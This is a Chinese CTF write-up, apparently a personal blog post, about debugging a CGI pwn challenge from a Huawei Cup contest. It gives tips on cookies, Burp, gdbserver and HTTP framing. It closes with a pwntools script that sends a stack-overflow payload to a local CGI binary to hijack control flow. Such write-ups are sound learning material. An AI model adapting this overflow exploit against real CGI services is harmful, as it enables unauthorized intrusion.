cgi调试
发表于:2023-10-04 |
字数统计: 696 | 阅读时长: 3分钟 | 阅读量:

cgi调试

在第二届华为杯上遇到一道cgi题,虽然逻辑很简单,但是输入一直有问题,最后还是赵哥用burp逐字节加的才打通。现记录下在比赛中遇到的问题。

  • 先是输入cookie拿到权限,题目中用getenv('HTTP_COOKIE')来获取http头的cookie,但http头的cookie字段默认为Cookie:

  • 调试时可以使用export 环境名=,来设置环境变量

  • 使用requests库发送请求时,发送字节会将字节url编码变成字符串。

  • 使用burp可以逐字节插入

image-20231004124346172

  • 使用gdbserver在docker中调试时,需要映射出一个端口供调试使用,2333即为调试端口,调试命令为gdbserver 宿主ip:port ./program ; 宿主机上,gdb-multiarch ./program;target remote :2333

image-20231004125350518

  • 在调试中想要输入字节时,可以先将字节输入到文件中(使用echo -e,或python),再利用重定向符或管道符,如./gdbserver-7.10.1-x64 :2333 ./check-ok.cgi < payload1

image-20231004130613324

  • 使用remote连接时,直接发送GET或POST包,注意,发送POST数据包时请求头和请求体需要用\r\n\r\n隔开,且Content-Length字段一定是请求体的长度,若长度大于请求体长度,则会服务器会等待直到收到剩余字节,若没有剩余字节则会报408错误码
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
from pwn import *

#elf=ELF('./getcookie.cgi')

context.log_level='debug'
context.terminal='wt.exe nt bash -c'.split()
io=remote('127.0.0.1',9999)
payload = b'''GET /getcookie.cgi HTTP/1.1\r\nHost: 127.0.0.1:9999\r\nUpgrade-Insecure-Requests: 1\r\nUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Edg/117.0.2045.41\r\nAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7\r\nReferer: http://127.0.0.1:9999/\r\nAccept-Encoding: gzip, deflate\r\nAccept-Language: zh-CN,zh;q=0.9,en;q=0.8,en-GB;q=0.7,en-US;q=0.6\r\nCookie: ROOT-GOD=Every king's blood will end with a sword;\r\nConnection: close\r\n\r\n'''
#gdb.attach(io)
#pause()
io.send(payload)
print(str(io.recv(1024)))
io=remote('127.0.0.1',9999)

payload = b'''POST /check-ok.cgi HTTP/1.1\r\nHost: 127.0.0.1:9999\r\nContent-Length: 248\r\nCache-Control: max-age=0\r\nUpgrade-Insecure-Requests: 1\r\nOrigin: http://127.0.0.1:9999\r\nContent-Type: application/x-www-form-urlencoded\r\nAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7\r\nReferer: http://127.0.0.1:9999/\r\nAccept-Encoding: gzip, deflate\r\nAccept-Language: zh-CN,zh;q=0.9,en;q=0.8,en-GB;q=0.7,en-US;q=0.6\r\n\r\n'''
payload1 = b'cmd='+b'a'*0xe4+p64(0x4032fc)+p64(0x4032E0)
io.send(payload+payload1)
a = open('payload.txt','wb')
a.write((payload1))
print(len(payload))
print(str(io.recv(1024)))
io.interactive()
上一篇:
protobuf初探
下一篇:
VxWorks固件解包

    • Copyright © 2019 - 2020 yuang01 | Powered by Hexo | Theme Bamboo

    本站总访问量: |